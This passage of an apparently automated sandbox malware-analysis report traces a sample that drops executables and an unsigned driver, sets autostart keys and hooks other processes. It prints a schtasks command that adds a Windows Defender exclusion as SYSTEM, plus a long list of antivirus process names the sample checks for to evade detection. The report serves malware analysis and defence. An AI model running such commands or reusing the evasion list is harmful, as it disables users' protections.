Static PE information: Image base 0x140000000 > 0x60000000

Source: 45631.exe

Static file information: File size 31614976 > 1048576

Source: 45631.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
Source:	Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: Twhtlb.exe, 00000028.00000002.3979563135.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000028.00000000.3611622084.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000028.00000002.3979769502.000000000115E000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000029.00000002.3648686550.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000029.00000000.3638122049.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, 6WWeC.exe, 0000002A.00000000.3641345339.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe, 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, Twhtlb.exe, 0000002D.00000000.3651208728.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002D.00000002.3663827299.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002E.00000002.3756389310.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002E.00000000.3747948848.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, 6WWeC.exe, 0000002F.00000002.3764008827.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe, 0000002F.00000000.3751219420.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe.40.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: sgH8Ps.exe, 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe, 00000006.00000000.2757387672.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe, 00000007.00000000.3147439412.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe.0.dr

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe

Unpacked PE file: 40.2.Twhtlb.exe.5300000.7.unpack

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_000000014000F000

Source: initial sample

Static PE information: section where entry point is pointing to: .mo:

Source: tbcore3U.dll.7.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.7.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.7.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.40.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.40.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.40.dr	Static PE information: section name: .mo:

Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe

Code function: 42_2_00522691 push ecx; ret

42_2_005226A4

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\45631.exe	File created: C:\Users\user\Documents\sgH8Ps.exe			Jump to dropped file
Source: C:\Users\user\Desktop\45631.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\45631.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\45631.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Desktop\45631.exe	File created: C:\Users\user\Documents\sgH8Ps.exe	Jump to dropped file
Source: C:\Users\user\Documents\sgH8Ps.exe	File created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Jump to dropped file
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	File created: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\45631.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Documents\sgH8Ps.exe	File created: C:\Program Files (x86)\Twhtlb\tbcore3U.dll	Jump to dropped file
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	File created: C:\Program Files (x86)\K5YQV85\tbcore3U.dll	Jump to dropped file

Source: C:\Users\user\Desktop\45631.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe

Registry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron

Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe

6_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\sgH8Ps.exe	Memory written: PID: 4920 base: 7FFDB4590008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Memory written: PID: 4920 base: 7FFDB442D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Memory written: PID: 6196 base: 7FFDB4590008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Memory written: PID: 6196 base: 7FFDB442D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 3744 base: 1140005 value: E9 8B 2F 24 76	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 3744 base: 77382F90 value: E9 7A D0 DB 89	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 3744 base: 1560005 value: E9 8B 2F E2 75	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 3744 base: 77382F90 value: E9 7A D0 1D 8A	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 1224 base: 1200005 value: E9 8B 2F 18 76
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 1224 base: 77382F90 value: E9 7A D0 E7 89
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Memory written: PID: 1124 base: 920005 value: E9 8B 2F A6 76
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Memory written: PID: 1124 base: 77382F90 value: E9 7A D0 59 89
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 5692 base: E20005 value: E9 8B 2F 56 76
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 5692 base: 77382F90 value: E9 7A D0 A9 89
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 4908 base: E10005 value: E9 8B 2F 57 76
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Memory written: PID: 4908 base: 77382F90 value: E9 7A D0 A8 89
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Memory written: PID: 2456 base: 8E0005 value: E9 8B 2F AA 76
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Memory written: PID: 2456 base: 77382F90 value: E9 7A D0 55 89

Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CA9B056
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9D87AA
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CA8A702
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CAC82C1
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9AFFCB
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CAB6E74
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CA48647
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C8FDE34
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 41C1A77
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 3D1A400
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 3D9119D
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 3DD8F6F
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 3E8E5B4
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 3E77E1B
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 3E81246
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9A5143
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9A3E38
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C369F9E
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C2E183C
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C265143
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C34A702
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CA1F839
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9E080B
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9E2089
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C2A080B
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C2EC0AF
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C2A2089
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9890FC
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9CF34F
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CAD6565
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CA75F8C
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6CAA9F9E
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C94BC04
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C25F34F
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C233E38
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C1DBC04
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C31A702
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C988B19
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	API/Special instruction interceptor: Address: 6C9D87B1
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C2687B1
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C377912
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C3791B6
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	API/Special instruction interceptor: Address: 6C362F48

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHuser.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

